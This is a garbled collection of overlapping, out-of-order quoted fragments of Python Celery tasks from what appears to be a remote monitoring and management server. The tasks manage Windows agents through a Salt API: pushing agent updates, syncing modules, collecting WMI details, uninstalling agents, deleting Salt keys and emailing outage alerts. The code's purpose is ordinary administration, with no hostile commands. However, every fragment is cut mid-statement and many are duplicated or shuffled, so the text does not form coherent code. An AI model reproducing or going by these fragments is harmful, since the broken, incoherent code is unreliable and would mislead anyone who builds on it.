Agent.objects.get(pk=pk) if agent.operating_system is not", "logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\",", "= (agents[i : i + 50] for i in range(0, len(agents), 50)) for", "== \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on", "f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={", "i.pk for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER)", "( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\",", "pk in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk):", "in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system info using", "inno, \"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents", "for i in agents if i.status == \"online\"] chunks = (online[i : i", "kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task(): q =", "and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk) if agent.overdue_text_alert: #", "inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r =", "from tacticalrmm.celery import app from agents.models import Agent, AgentOutage from core.models import CoreSettings", 
"try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\",", "for i in range(0, len(agents), 30)) for chunk in chunks: for pk in", "import requests from packaging import version as pyver from django.conf import settings from", "\"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", }", "return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") #", "if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no", "chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is not None:", "\"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful", "{agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task():", "error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post(", "settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable", "arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno,", "\"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id}", "f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, 
}, )", ">= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i +", "for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system", ">= 10: error = True break elif attempts == 0: break if error:", "import random import requests from packaging import version as pyver from django.conf import", "from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q", "version as pyver from django.conf import settings from tacticalrmm.celery import app from agents.models", "\"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\",", "50 agents to not overload salt agents = Agent.objects.all() online = [i.salt_id for", "in range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def", "outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15))", "+ 50] for i in range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk,", "def batch_sysinfo_task(): # update system info using WMI agents = Agent.objects.all() online =", "r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules", "range(0, len(agents), 50)) for chunk in chunks: for pk in chunk: agent =", "CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all() agents = [ i.pk for", "i + 50] for i in range(0, len(online), 50)) for chunk in chunks:", "= settings.DL_64 if arch == \"64\" 
else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if", "return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent =", "agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task():", "AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk)", ") r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10)", "if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch ==", "import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert", "arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\"", "pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i + 50] for i", "{'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no new/changed files: {'return':", "False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\":", "in agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system: arch = \"32\" else:", "Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)] chunks", "new/changed files: {'return': [{'MINION-15': []}]} if r == \"timeout\" or r == \"error\":", "= ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async(", 
"func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} #", "8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret =", ") sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return q", "new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no new/changed", "= Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\" in agent.operating_system: arch =", "if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i + 30] for", "agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task():", "== \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent)", "= Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r", "def batch_sync_modules_task(): # sync modules, split into chunks of 50 agents to not", "\"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ],", "\"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id]", "of 50 agents to not overload salt agents = Agent.objects.all() online = [i.salt_id", "to not overload salt agents = Agent.objects.all() online = [i.salt_id for i in", "batch_sync_modules_task(): # sync modules, split into chunks of 50 agents to not overload", "(online[i : i + 30] for i in 
range(0, len(online), 30)) for chunk", "== \"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return", "in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i +", "agent.operating_system: arch = \"32\" else: arch = \"64\" url = settings.DL_64 if arch", "else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, },", "= CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all() agents = [ i.pk", "arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch == \"64\"", "if i.status == \"online\"] chunks = (online[i : i + 50] for i", "from time import sleep import random import requests from packaging import version as", "chunks = (agents[i : i + 30] for i in range(0, len(agents), 30))", "error = True break elif attempts == 0: break if error: logger.error(f\"{salt_id} uninstall", "\"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except", "outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True", "func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0 error = False while 1:", "30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts =", "@app.task def update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk for i in", "in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0 error =", "agent = Agent.objects.get(pk=pk) 
r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r", "['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no new/changed files: {'return': [{'MINION-15': []}]}", "try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id,", "arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno,", "i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks", "q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i", "= Agent.objects.only(\"pk\") for agent in agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent)", "was successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\":", "info using WMI agents = Agent.objects.all() online = [ i.salt_id for i in", "r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else: if ret != \"ok\": attempts +=", "if ret != \"ok\": attempts += 1 else: attempts = 0 if attempts", "for i in range(0, len(agents), 50)) for chunk in chunks: for pk in", "salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ],", "arch = \"32\" else: arch = \"64\" url = settings.DL_64 if arch ==", "f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={", "\"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, 
\"url\": url,", "r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task", "def send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for", "\"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return", "logger from time import sleep import random import requests from packaging import version", "< pyver.parse(version)] chunks = (agents[i : i + 30] for i in range(0,", "and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i + 50] for", "@app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all()", "logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents =", "agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r", "= Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return':", "split into chunks of 50 agents to not overload salt agents = Agent.objects.all()", "agent.operating_system is not None: if \"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\"", "settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r", "and i.status == \"online\" ] chunks = (online[i : i + 30] for", "using WMI agents = Agent.objects.all() online = [ i.salt_id for i in agents", ": i + 50] for i in range(0, len(online), 50)) for chunk in", "= False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\",", "\"online\" ] chunks = (online[i : i + 
30] for i in range(0,", "\"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts +=", "successful sync with no new/changed files: {'return': [{'MINION-15': []}]} if r == \"timeout\"", "# successful sync with no new/changed files: {'return': [{'MINION-15': []}]} if r ==", "attempts += 1 else: attempts = 0 if attempts >= 10: error =", "for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i :", "else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, },", "logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage", "core.agent_auto_update: return q = Agent.objects.all() agents = [ i.pk for i in q", "chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\")", "@app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"])", "\"timeout\" or r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced", "subprocess from loguru import logger from time import sleep import random import requests", "ret != \"ok\": attempts += 1 else: attempts = 0 if attempts >=", "'etc...']}]} # successful sync with no new/changed files: {'return': [{'MINION-15': []}]} if r", "\"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\":", "sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True 
outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task():", "isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q if", "] chunks = (agents[i : i + 30] for i in range(0, len(agents),", "Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system info using WMI agents", "if r == \"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail = r", "func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core", "get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or", "as pyver from django.conf import settings from tacticalrmm.celery import app from agents.models import", "@app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk", "auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all() agents =", "agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue", "agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system: arch = \"32\" else: arch", "= requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8,", "attempts >= 10: error = True break elif attempts == 0: break if", "for pk in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is not None: if", "salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception:", "in range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, 
func=\"win_agent.local_sys_info\") sleep(10) @app.task def", "\"64\" elif \"32bit\" in agent.operating_system: arch = \"32\" else: arch = \"64\" url", "outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in", "'modules.win_agent', 'etc...']}]} # successful sync with no new/changed files: {'return': [{'MINION-15': []}]} if", "+= 1 else: if ret != \"ok\": attempts += 1 else: attempts =", "return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): #", "< pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i + 50] for i in", "+ 50] for i in range(0, len(agents), 50)) for chunk in chunks: for", "attempts = 0 error = False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\",", "continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk) if agent.overdue_text_alert: # TODO pass", "import logger from time import sleep import random import requests from packaging import", "if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch ==", "outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email()", "50)) for chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) r", "synced salt modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync modules,", "(agents[i : i + 50] for i in range(0, len(agents), 50)) for chunk", "\"ok\": attempts += 1 else: attempts = 0 if attempts >= 10: error", "not None: if \"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system:", "in agents if i.status == \"online\"] chunks = (online[i : i + 
50]", "= Agent.objects.all() agents = [ i.pk for i in q if pyver.parse(i.version) <", "agents.models import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version):", "( f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\",", "agents if not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks = (online[i :", "chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is", "len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts", "core = CoreSettings.objects.first() if not core.agent_auto_update: return q = Agent.objects.all() agents = [", "r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35,", "= 0 error = False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[", "in range(0, len(agents), 50)) for chunk in chunks: for pk in chunk: agent", "\"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not", "== \"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else", "if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i :", "], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else: if", "r == \"timeout\" or r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return", "sleep(10) @app.task def batch_sysinfo_task(): # update system info using WMI agents = Agent.objects.all()", "for chunk in chunks: for pk in chunk: agent = 
Agent.objects.get(pk=pk) r =", "not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks = (online[i : i +", "1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\":", ": i + 30] for i in range(0, len(agents), 30)) for chunk in", "1 else: if ret != \"ok\": attempts += 1 else: attempts = 0", "# successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful", "30] for i in range(0, len(agents), 30)) for chunk in chunks: for pk", "sync with no new/changed files: {'return': [{'MINION-15': []}]} if r == \"timeout\" or", "in range(0, len(agents), 30)) for chunk in chunks: for pk in chunk: agent", "for pk in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def", "\"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1", "i in range(0, len(agents), 30)) for chunk in chunks: for pk in chunk:", "pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i + 50] for i in range(0,", "attempts == 0: break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully", "chunks of 50 agents to not overload salt agents = Agent.objects.all() online =", "for i in agents if not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks", "url = settings.DL_64 if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\"", "i in range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task", "logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync", "sync modules, split into chunks of 50 agents to not overload salt agents", "\"ok\" @app.task def batch_sync_modules_task(): # sync 
modules, split into chunks of 50 agents", "\"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system: arch = \"32\"", "sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk for i", "salt agents = Agent.objects.all() online = [i.salt_id for i in agents if i.status", "i in range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task", "agents if i.status == \"online\"] chunks = (online[i : i + 50] for", "10: error = True break elif attempts == 0: break if error: logger.error(f\"{salt_id}", "@app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents: if agent.status ==", "i in agents if not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks =", "= requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME,", "= [ i.pk for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks", "else: attempts = 0 if attempts >= 10: error = True break elif", "outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk)", "{agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync modules, split into chunks of", "r == \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def", "or r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt", "list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q if pyver.parse(i.version)", "\"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" 
@app.task def sync_salt_modules_task(pk): agent", "sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return q =", "= AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage", "outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk) if agent.overdue_text_alert: # TODO", "for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ]", "\"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove salt-key\")", "for chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system", "i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks = (online[i : i + 30]", "attempts = 0 if attempts >= 10: error = True break elif attempts", "if arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\":", "True break elif attempts == 0: break if error: logger.error(f\"{salt_id} uninstall failed\") else:", "= r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r =", "agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents: if agent.status == \"overdue\": outages", "@app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r ==", "pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i + 30] for i in", "i.salt_id for i in agents if not i.not_supported(\"0.11.0\") and i.status == \"online\" ]", "agent = 
Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files:", "Agent.objects.only(\"pk\") for agent in agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if", "= [i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i", "logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\",", "url = settings.DL_64 if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\"", "= r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else: if ret != \"ok\": attempts", "in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent", "i + 30] for i in range(0, len(online), 30)) for chunk in chunks:", "for i in range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10)", "], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task", "timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else: if ret", "requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\":", "\"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True", "= (online[i : i + 50] for i in range(0, len(online), 50)) for", "uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post( 